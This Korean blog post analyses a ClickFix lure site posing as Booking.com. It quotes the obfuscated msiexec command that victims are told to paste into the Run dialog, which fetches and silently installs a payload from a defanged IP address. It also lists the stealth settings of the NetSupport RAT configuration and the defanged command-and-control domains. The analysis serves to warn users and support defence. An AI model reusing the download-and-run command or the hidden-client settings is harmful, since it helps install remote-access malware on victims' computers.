오늘은 부킹닷컴 으로 위장하는 클릭픽스 공격 사이트 분석을 하는 시간을 가져 보겠습니다. 일단 해당 클릭픽스(ClickFix)방법을 통해서 사용자 컴퓨터를 노리는 방식 입니다.
유포 사이트
propertypanelreservations(.)com
일단 해당 사이트에 접속을 하면 먼저 언제나 클릭픽스(ClickFix) 처럼 윈도우+R 를 실행을 하고 나서 복사 붙여 넣기를 하라고 하면 이때부터 사용자는 악성코드를 직접 실행하게 됩니다.
msIeXec.ExE -PᵃcKᵃGE hxxp://147(.)45(.)45(.)245/genius /Q
msIeXec.ExE:Windows Installer 실행 파일이며 대소문자 섞기는 탐지 우회 목적 가능
-PᵃcKᵃGE /package 옵션을 가장한 형태로 보임.
ᵃ는 일반 ASCII a가 아닌 유니코드 문자
hxxp://147(.)45(.)45(.)245/genius
/Q:quiet 모드 사용자 화면 표시 없이 실행
AltPayload pw fantombot 안에 있는 폴더에 client32.ini,client32u.ini 있는 것을 확인할 수가 있습니다.
client32u.ini를 예를 들면 다음과 같은 코드가 있는 것을 확인할 수가 있습니다.
silent=1:사용자 몰래 조용히 실행
SysTray=0:작업표시줄,트레이 아이콘 숨김
ShowUIOnConnect=0:원격 접속 시 화면 알림 숨김
BeepUsingSpeaker=0:접속 알림음 비활성화
DisableChatMenu=1:채팅 메뉴 비활성화
DisableDisconnect=1:사용자가 연결을 끊지 못하게 함
DisableClientConnect=1:클라이언트 측 접속 기능 제한
DisableRequestHelp=1:도움 요청 기능 비활성화
원격이라면 보통 사용자가 연결 상태를 알 수 있어야 하고 연결 해제나 도움 요청 기능이 남아 있어야 함 이런 것 없음
나는 악성코드라서 하는 것임
전체 동작
클라이언트는 실행되면 먼저 다음 서버로 접속 시도
접속이 실패 시 보조 서버로 연결
공격자는 NetSupport 콘솔을 통해 피해 PC를 원격에서 볼 수 있고 설정에 따라 키보드, 마우스 제어, 파일 전송, 추가 명령 실행 등을 할 수 있습니다.
요약
의심 도구:NetSupport Manager Client,NetSupport RAT
설정 파일:C:\Users\Administrator\Desktop\client\client32u.ini
주 접속 서버:img-pulse-cache(.)com:443
보조 접속 서버:booking-static-assets(.)com:443
통신 포트:443
아무튼, 부킹닷컴 은 단골이니 조심하자~
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| Kimsuky(김수키)에서 만든 악성코드-하나은행_웨이브릿지 전략적 협업 제안서.lnk (0) | 2026.05.20 |
|---|---|
| 마이크로소프트 입장 번복 마이크로소프트 엣지,비밀번호 메모리 로딩 중단 (0) | 2026.05.19 |
| 경북 청도군 를 노린 김수키(Kimsuky)에서 만든 악성코드-노X정님.jse (0) | 2026.05.18 |
| 윈도우 11,윈도우 10 KB5089549 & KB5087420,KB5087544 보안 업데이트 (0) | 2026.05.16 |
| 한전 전기 요금 청구서로 위장한 피싱 메일 분석 (0) | 2026.05.15 |
| 북한 해킹 단체 코니(Konni)에서 만든 악성코드-0a6934a3_.lnk (0) | 2026.05.14 |
| 인스타그램 다이렉트 메시지 종단 간 암호화 기능 제거 메타가 채팅 내용에 접근 가능 (0) | 2026.05.13 |
| 인스타그램 DM 으로 유포 되는 네이버 계정 탈취 목적 김수키(Kimsuky)에서 만든 네이버 피싱 사이트 분석 (0) | 2026.05.11 |
